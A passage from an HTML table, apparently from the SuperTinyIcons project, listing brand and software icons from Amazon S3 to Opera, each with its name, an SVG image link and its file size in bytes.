bytes</td> <td>Amazon Simple Storage Service<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/amazon_s3.svg" width="100" title="Amazon Simple Storage Service"><br>533 bytes</td> <td>Amber Framework<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/amberframework.svg" width="100" title="Amber Framework"><br>421 bytes</td> <td>andOTP<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/andotp.svg" width="100" title="andOTP"><br>259 bytes</td> <td>Android<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/android.svg" width="100" title="Android"><br>378 bytes</td> </tr> <tr> <td>AngelList<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/angellist.svg" width="100" title="AngelList"><br>974 bytes</td> <td>Angular<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/angular.svg" width="100" title="Angular"><br>323 bytes</td> <td>Ansible<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/ansible.svg" width="100" title="Ansible"><br>317 bytes</td> <td>Apereo Foundation<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/apereo.svg" width="100" title="Apereo Foundation"><br>464 bytes</td> <td>Apple<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/apple.svg" width="100" title="Apple"><br>360 bytes</td> <td>Apple Music<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/apple_music.svg" width="100" title="Apple Music"><br>496 bytes</td> </tr> <tr> <td>Arch Linux<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/arch_linux.svg" width="100" title="Arch Linux"><br>316 bytes</td> <td>Atom<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/atom.svg" width="100" title="Atom"><br>353 bytes</td> <td>Auth0<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/auth0.svg" width="100" title="Auth0"><br>398 bytes</td> <td>Authy<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/authy.svg" width="100" title="Authy"><br>338 bytes</td> <td>Backbone<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/backbone.svg" width="100" title="Backbone"><br>454 bytes</td> <td>Badoo<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/badoo.svg" width="100" title="Badoo"><br>304 bytes</td> </tr> <tr> <td>Baidu<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/baidu.svg" width="100" title="Baidu"><br>790 bytes</td> <td>Bandcamp<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/bandcamp.svg" width="100" title="Bandcamp"><br>194 bytes</td> <td>Bash<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/bash.svg" width="100" title="Bash"><br>762 bytes</td> <td>Behance<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/behance.svg" width="100" title="Behance"><br>677 bytes</td> <td>Bing<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/bing.svg" width="100" title="Bing"><br>945 bytes</td> <td>Bitbucket<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/bitbucket.svg" width="100" title="Bitbucket"><br>672 bytes</td> </tr> <tr> <td>Bitcoin<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/bitcoin.svg" width="100" title="Bitcoin"><br>520 bytes</td> <td>Bitwarden<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/bitwarden.svg" width="100" title="Bitwarden"><br>292 bytes</td> <td>Blender<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/blender.svg" width="100" title="Blender"><br>375 bytes</td> <td>Blogger<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/blogger.svg" width="100" title="Blogger"><br>345 bytes</td> <td>Bluetooth<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/bluetooth.svg" width="100" title="Bluetooth"><br>486 bytes</td> <td>Brave<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/brave.svg" width="100" title="Brave"><br>1003 bytes</td> </tr> <tr> <td>Briar<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/briar.svg" width="100" title="Briar"><br>565 bytes</td> <td>Buffer<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/buffer.svg" width="100" title="Buffer"><br>480 bytes</td> <td>Bugcrowd<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/bugcrowd.svg" width="100" title="Bugcrowd"><br>790 bytes</td> <td>Bun<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/bun.svg" width="100" title="Bun"><br>1023 bytes</td> <td>Calendar<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/calendar.svg" width="100" title="Calendar"><br>744 bytes</td> <td>CentOS<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/centos.svg" width="100" title="CentOS"><br>734 bytes</td> </tr> <tr> <td>Chrome<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/chrome.svg" width="100" title="Chrome"><br>407 bytes</td> <td>Chromium<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/chromium.svg" width="100" title="Chromium"><br>409 bytes</td> <td>Citrix<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/citrix.svg" width="100" title="Citrix"><br>751 bytes</td> <td>Citrix<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/citrix_compact.svg" width="100" title="Citrix"><br>349 bytes</td> <td>Clojure<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/clojure.svg" width="100" title="Clojure"><br>567 bytes</td> <td>Cloudflare<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/cloudflare.svg" width="100" title="Cloudflare"><br>491 bytes</td> </tr> <tr> <td>Codeberg<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/codeberg.svg" width="100" title="Codeberg"><br>469 bytes</td> <td>CodePen<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/codepen.svg" width="100" title="CodePen"><br>309 bytes</td> <td>Coderwall<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/coderwall.svg" width="100" title="Coderwall"><br>250 bytes</td> <td>CoffeeScript<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/coffeescript.svg" width="100" title="CoffeeScript"><br>525 bytes</td> <td>Coil<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/coil.svg" width="100" title="Coil"><br>507 bytes</td> <td>coinpot<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/coinpot.svg" width="100" title="coinpot"><br>730 bytes</td> </tr> <tr> <td>Google Colab<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/colaboratory.svg" width="100" title="Google Colab"><br>380 bytes</td> <td>C++<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/cplusplus.svg" width="100" title="C++"><br>685 bytes</td> <td>Crystal<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/crystal.svg" width="100" title="Crystal"><br>220 bytes</td> <td>CSS3<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/css3.svg" width="100" title="CSS3"><br>384 bytes</td> <td>Dart<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/dart.svg" width="100" title="Dart"><br>554 bytes</td> <td>DataCamp<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/datacamp.svg" width="100" title="DataCamp"><br>482 bytes</td> </tr> <tr> <td>Debian<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/debian.svg" width="100" title="Debian"><br>928 bytes</td> <td>Deezer<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/deezer.svg" width="100" title="Deezer"><br>724 bytes</td> <td>Delicious<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/delicious.svg" width="100" title="Delicious"><br>265 bytes</td> <td>dev.to<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/dev_to.svg" width="100" title="dev.to"><br>544 bytes</td> <td>DeviantArt<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/deviantart.svg" width="100" title="DeviantArt"><br>269 bytes</td> <td>Digidentity<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/digidentity.svg" width="100" title="Digidentity"><br>374 bytes</td> </tr> <tr> <td>DigitalOcean<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/digitalocean.svg" width="100" title="DigitalOcean"><br>250 bytes</td> <td>Discord<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/discord.svg" width="100" title="Discord"><br>356 bytes</td> <td>Disqus<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/disqus.svg" width="100" title="Disqus"><br>265 bytes</td> <td>Django Project<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/djangoproject.svg" width="100" title="Django Project"><br>434 bytes</td> <td>Docker<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/docker.svg" width="100" title="Docker"><br>422 bytes</td> <td>Dribble<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/dribbble.svg" width="100" title="Dribble"><br>371 bytes</td> </tr> <tr> <td>Drone<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/drone.svg" width="100" title="Drone"><br>297 bytes</td> <td>Dropbox<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/dropbox.svg" width="100" title="Dropbox"><br>253 bytes</td> <td>Drupal<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/drupal.svg" width="100" title="Drupal"><br>890 bytes</td> <td>DuckDuckGo<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/duckduckgo.svg" width="100" title="DuckDuckGo"><br>916 bytes</td> <td>Electronic Arts<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/ea.svg" width="100" title="Electronic Arts"><br>287 bytes</td> <td>eBay<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/ebay.svg" width="100" title="eBay"><br>810 bytes</td> </tr> <tr> <td>Ecosia<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/ecosia.svg" width="100" title="Ecosia"><br>782 bytes</td> <td>Edge<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/edge.svg" width="100" title="Edge"><br>1023 bytes</td> <td>elastic<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/elastic.svg" width="100" title="elastic"><br>720 bytes</td> <td>Element<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/element.svg" width="100" title="Element"><br>426 bytes</td> <td>Elementary OS<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/elementaryos.svg" width="100" title="Elementary OS"><br>457 bytes</td> <td>Email<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/email.svg" width="100" title="Email"><br>333 bytes</td> </tr> <tr> <td>Endeavour OS<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/endeavouros.svg" width="100" title="Endeavour OS"><br>630 bytes</td> <td>ePub<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/epub.svg" width="100" title="ePub"><br>314 bytes</td> <td>Espressif<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/espressif.svg" width="100" title="Espressif"><br>584 bytes</td> <td>Ethereum<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/ethereum.svg" width="100" title="Ethereum"><br>388 bytes</td> <td>Etsy<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/etsy.svg" width="100" title="Etsy"><br>468 bytes</td> <td>Evernote<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/evernote.svg" width="100" title="Evernote"><br>619 bytes</td> </tr> <tr> <td>ExpressionEngine<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/expressionengine.svg" width="100" title="ExpressionEngine"><br>634 bytes</td> <td>F-Droid<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/f-droid.svg" width="100" title="F-Droid"><br>1021 bytes</td> <td>Facebook<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/facebook.svg" width="100" title="Facebook"><br>264 bytes</td> <td>Fediverse<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/fediverse.svg" width="100" title="Fediverse"><br>1009 bytes</td> <td>Filestash<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/filestash.svg" width="100" title="Filestash"><br>294 bytes</td> <td>Finder<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/finder.svg" width="100" title="Finder"><br>675 bytes</td> </tr> <tr> <td>Firefox<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/firefox.svg" width="100" title="Firefox"><br>1013 bytes</td> <td>Flattr<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/flattr.svg" width="100" title="Flattr"><br>338 bytes</td> <td>Flickr<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/flickr.svg" width="100" title="Flickr"><br>241 bytes</td> <td>Floatplane<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/floatplane.svg" width="100" title="Floatplane"><br>832 bytes</td> <td>Flutter<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/flutter.svg" width="100" title="Flutter"><br>683 bytes</td> <td>foobar2000<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/foobar2000.svg" width="100" title="foobar2000"><br>757 bytes</td> </tr> <tr> <td>FreeBSD<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/freebsd.svg" width="100" title="FreeBSD"><br>747 bytes</td> <td>freeCodeCamp<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/freecodecamp.svg" width="100" title="freeCodeCamp"><br>717 bytes</td> <td>Friendica<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/friendica.svg" width="100" title="Friendica"><br>835 bytes</td> <td>Fritz!<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/fritz.svg" width="100" title="Fritz!"><br>622 bytes</td> <td>Gandi<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/gandi.svg" width="100" title="Gandi"><br>756 bytes</td> <td>GateHub<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/gatehub.svg" width="100" title="GateHub"><br>453 bytes</td> </tr> <tr> <td>Ghost<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/ghost.svg" width="100" title="Ghost"><br>250 bytes</td> <td>Git<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/git.svg" width="100" title="Git"><br>373 bytes</td> <td>Gitea<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/gitea.svg" width="100" title="Gitea"><br>756 bytes</td> <td>GitHub<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/github.svg" width="100" title="GitHub"><br>533 bytes</td> <td>GitLab<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/gitlab.svg" width="100" title="GitLab"><br>431 bytes</td> <td>Gitpod<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/gitpod.svg" width="100" title="Gitpod"><br>549 bytes</td> </tr> <tr> <td>Glitch<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/glitch.svg" width="100" title="Glitch"><br>1023 bytes</td> <td>Gmail<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/gmail.svg" width="100" title="Gmail"><br>452 bytes</td> <td>Gmail<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/gmail_old.svg" width="100" title="Gmail"><br>575 bytes</td> <td>Go<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/go.svg" width="100" title="Go"><br>573 bytes</td> <td>Godot<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/godot.svg" width="100" title="Godot"><br>689 bytes</td> <td>GOG.com<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/gogcom.svg" width="100" title="GOG.com"><br>709 bytes</td> </tr> <tr> <td>Gojek<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/gojek.svg" width="100" title="Gojek"><br>264 bytes</td> <td>Goodreads<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/goodreads.svg" width="100" title="Goodreads"><br>377 bytes</td> <td>Google<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/google.svg" width="100" title="Google"><br>455 bytes</td> <td>Google Assistant<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/google_assistant.svg" width="100" title="Google Assistant"><br>372 bytes</td> <td>Google Calendar<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/google_calendar.svg" width="100" title="Google Calendar"><br>586 bytes</td> <td>Google Collaborative content tools<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/google_collaborative_content_tools.svg" width="100" title="Google Collaborative content tools"><br>493 bytes</td> </tr> <tr> <td>Google Docs Editors<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/google_docs_editors.svg" width="100" title="Google Docs Editors"><br>478 bytes</td> <td>Google Drive<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/google_drive.svg" width="100" title="Google Drive"><br>567 bytes</td> <td>Google Drive<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/google_drive_old.svg" width="100" title="Google Drive"><br>304 bytes</td> <td>Google Maps<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/google_maps.svg" width="100" title="Google Maps"><br>560 bytes</td> <td>Google Maps<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/google_maps_old.svg" width="100" title="Google Maps"><br>704 bytes</td> <td>Google Meet<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/google_meet.svg" width="100" title="Google Meet"><br>520 bytes</td> </tr> <tr> <td>Google Play<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/google_play.svg" width="100" title="Google Play"><br>426 bytes</td> <td>Google+<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/google_plus.svg" width="100" title="Google+"><br>388 bytes</td> <td>Google Podcasts<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/google_podcasts.svg" width="100" title="Google Podcasts"><br>450 bytes</td> <td>Google Scholar<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/google_scholar.svg" width="100" title="Google Scholar"><br>524 bytes</td> <td>Gradle<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/gradle.svg" width="100" title="Gradle"><br>681 bytes</td> <td>Grafana<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/grafana.svg" width="100" title="Grafana"><br>680 bytes</td> </tr> <tr> <td>Guacamole<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/guacamole.svg" width="100" title="Guacamole"><br>676 bytes</td> <td>Guilded<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/guilded.svg" width="100" title="Guilded"><br>359 bytes</td> <td>Hacker News<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/hackernews.svg" width="100" title="Hacker News"><br>220 bytes</td> <td>HackerOne<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/hackerone.svg" width="100" title="HackerOne"><br>437 bytes</td> <td>HAML<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/haml.svg" width="100" title="HAML"><br>928 bytes</td> <td>Heroku<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/heroku.svg" width="100" title="Heroku"><br>441 bytes</td> </tr> <tr> <td>Homekit<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/homekit.svg" width="100" title="Homekit"><br>743 bytes</td> <td>HP<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/hp.svg" width="100" title="HP"><br>487 bytes</td> <td>HTML5<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/html5.svg" width="100" title="HTML5"><br>399 bytes</td> <td>Hulu<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/hulu.svg" width="100" title="Hulu"><br>472 bytes</td> <td>Humble Bundle<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/humblebundle.svg" width="100" title="Humble Bundle"><br>969 bytes</td> <td>i18next<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/i18next.svg" width="100" title="i18next"><br>719 bytes</td> </tr> <tr> <td>IBM<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/ibm.svg" width="100" title="IBM"><br>494 bytes</td> <td>iHeartRadio<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/iheartradio.svg" width="100" title="iHeartRadio"><br>884 bytes</td> <td>IMDb<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/imdb.svg" width="100" title="IMDb"><br>517 bytes</td> <td>Imgur<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/imgur.svg" width="100" title="Imgur"><br>269 bytes</td> <td>Instagram<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/instagram.svg" width="100" title="Instagram"><br>758 bytes</td> <td>Intel<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/intel.svg" width="100" title="Intel"><br>748 bytes</td> </tr> <tr> <td>Intercom<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/intercom.svg" width="100" title="Intercom"><br>423 bytes</td> <td>Internet Archive<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/internet_archive.svg" width="100" title="Internet Archive"><br>837 bytes</td> <td>itch.io<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/itch_io.svg" width="100" title="itch.io"><br>861 bytes</td> <td>iTunes<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/itunes_podcasts.svg" width="100" title="iTunes"><br>770 bytes</td> <td>Jacobin<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/jacobin.svg" width="100" title="Jacobin"><br>232 bytes</td> <td>Java<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/java.svg" width="100" title="Java"><br>824 bytes</td> </tr> <tr> <td>JavaScript<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/javascript.svg" width="100" title="JavaScript"><br>410 bytes</td> <td>Jellyfin<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/jellyfin.svg" width="100" title="Jellyfin"><br>661 bytes</td> <td>jQuery<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/jquery.svg" width="100" title="jQuery"><br>1012 bytes</td> <td>JSON-LD<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/json-ld.svg" width="100" title="JSON-LD"><br>912 bytes</td> <td>JSON<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/json.svg" width="100" title="JSON"><br>514 bytes</td> <td>JSON Feed<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/jsonfeed.svg" width="100" title="JSON Feed"><br>672 bytes</td> </tr> <tr> <td>Julia<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/julia.svg" width="100" title="Julia"><br>289 bytes</td> <td>Kaggle<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/kaggle.svg" width="100" title="Kaggle"><br>508 bytes</td> <td>KeePassDX<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/keepassdx.svg" width="100" title="KeePassDX"><br>522 bytes</td> <td>Kemal Framework<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/kemal.svg" width="100" title="Kemal Framework"><br>331 bytes</td> <td>Keskonfai<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/keskonfai.svg" width="100" title="Keskonfai"><br>691 bytes</td> <td>Keybase<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/keybase.svg" width="100" title="Keybase"><br>638 bytes</td> </tr> <tr> <td>Kickstarter<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/kickstarter.svg" width="100" title="Kickstarter"><br>279 bytes</td> <td>Ko-Fi<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/ko-fi.svg" width="100" title="Ko-Fi"><br>412 bytes</td> <td>Kodi<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/kodi.svg" width="100" title="Kodi"><br>762 bytes</td> <td>Kotlin<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/kotlin.svg" width="100" title="Kotlin"><br>242 bytes</td> <td>Laravel<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/laravel.svg" width="100" title="Laravel"><br>390 bytes</td> <td>LastPass<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/lastpass.svg" width="100" title="LastPass"><br>288 bytes</td> </tr> <tr> <td>Liberapay<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/liberapay.svg" width="100" title="Liberapay"><br>556 bytes</td> <td>LibreSpeed<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/librespeed.svg" width="100" title="LibreSpeed"><br>948 bytes</td> <td>LINE<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/line.svg" width="100" title="LINE"><br>469 bytes</td> <td>Linear<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/linearapp.svg" width="100" title="Linear"><br>396 bytes</td> <td>LinkedIn<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/linkedin.svg" width="100" title="LinkedIn"><br>361 bytes</td> <td>Linux<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/linux.svg" width="100" title="Linux"><br>956 bytes</td> </tr> <tr> <td>Linux Mint<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/linux_mint.svg" width="100" title="Linux Mint"><br>365 bytes</td> <td>Lobste.rs<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/lobsters.svg" width="100" title="Lobste.rs"><br>524 bytes</td> <td>Lock<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/lock.svg" width="100" title="Lock"><br>384 bytes</td> <td>Logitech<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/logitech.svg" width="100" title="Logitech"><br>360 bytes</td> <td>Lucky Framework<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/luckyframework.svg" width="100" title="Lucky Framework"><br>477 bytes</td> <td>macOS<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/macos.svg" width="100" title="macOS"><br>765 bytes</td> </tr> <tr> <td>Mail<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/mail.svg" width="100" title="Mail"><br>563 bytes</td> <td>Mailchimp<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/mailchimp.svg" width="100" title="Mailchimp"><br>990 bytes</td> <td>Malt<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/malt.svg" width="100" title="Malt"><br>419 bytes</td> <td>Manjaro<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/manjaro.svg" width="100" title="Manjaro"><br>358 bytes</td> <td>Markdown<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/markdown.svg" width="100" title="Markdown"><br>440 bytes</td> <td>Mastodon<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/mastodon.svg" width="100" title="Mastodon"><br>588 bytes</td> </tr> <tr> <td>matrix<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/matrix.svg" width="100" title="matrix"><br>662 bytes</td> <td>Mattermost<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/mattermost.svg" width="100" title="Mattermost"><br>605 bytes</td> <td>Medium<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/medium.svg" width="100" title="Medium"><br>231 bytes</td> <td>Meetup<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/meetup.svg" width="100" title="Meetup"><br>515 bytes</td> <td>Messenger<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/messenger.svg" width="100" title="Messenger"><br>685 bytes</td> <td>microformats<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/microformats.svg" width="100" title="microformats"><br>789 bytes</td> </tr> <tr> <td>Microsoft<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/microsoft.svg" width="100" title="Microsoft"><br>327 bytes</td> <td>Minecraft<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/minecraft.svg" width="100" title="Minecraft"><br>1014 bytes</td> <td>MongoDB<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/mongodb.svg" width="100" title="MongoDB"><br>359 bytes</td> <td>NetBeans<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/netbeans.svg" width="100" title="NetBeans"><br>528 bytes</td> <td>Netflix<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/netflix.svg" width="100" title="Netflix"><br>441 bytes</td> <td>NextCloud<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/nextcloud.svg" width="100" title="NextCloud"><br>302 bytes</td> </tr> <tr> <td>NGINX<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/nginx.svg" width="100" title="NGINX"><br>456 bytes</td> <td>NHS<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/nhs.svg" width="100" title="NHS"><br>482 bytes</td> <td>NixOS<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/nixos.svg" width="100" title="NixOS"><br>534 bytes</td> <td>Node.js<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/nodejs.svg" width="100" title="Node.js"><br>659 bytes</td> <td>npm<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/npm.svg" width="100" title="npm"><br>283 bytes</td> <td>OK.ru<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/ok.svg" width="100" title="OK.ru"><br>621 bytes</td> </tr> <tr> <td>Olympic Rings<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/olympics.svg" width="100" title="Olympic Rings"><br>669 bytes</td> <td>OpenBenches<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/openbenches.svg" width="100" title="OpenBenches"><br>754 bytes</td> <td>Open Bug Bounty<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/openbugbounty.svg" width="100" title="Open Bug Bounty"><br>494 bytes</td> <td>Opencast<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/opencast.svg" width="100" title="Opencast"><br>303 bytes</td> <td>Open Collective<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/opencollective.svg" width="100" title="Open Collective"><br>310 bytes</td> <td>OpenCores<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/opencores.svg" width="100" title="OpenCores"><br>273 bytes</td> </tr> <tr> <td>Open Source<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/opensource.svg" width="100" title="Open Source"><br>342 bytes</td> <td>OpenStreetMap<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/openstreetmap.svg" width="100" title="OpenStreetMap"><br>958 bytes</td> <td>OpenVPN<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/openvpn.svg" width="100" title="OpenVPN"><br>284 bytes</td> <td>Opera<br><img 